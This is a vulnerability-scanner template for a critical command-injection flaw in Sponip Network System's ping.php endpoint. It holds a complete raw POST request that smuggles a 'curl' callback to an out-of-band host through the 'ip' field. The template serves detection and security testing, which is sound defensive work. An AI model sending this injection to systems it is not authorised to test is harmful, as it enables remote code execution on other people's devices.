id: sponip-network-system-ping-rce

info:
  name: Sponip Network System Ping - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    Sponip Network System Ping is susceptible to remote code execution.
  reference:
    - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: sponip,rce,oast,network

requests:
  - raw:
      - |
        POST /php/ping.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sondata[ip]=a|curl {{interactsh-url}}&jsondata[type]=1

    matchers:
      - type: word
        part: interactsh_protocol
        name: http
        words:
          - "http"

# Enhanced by mp on 2022/05/30
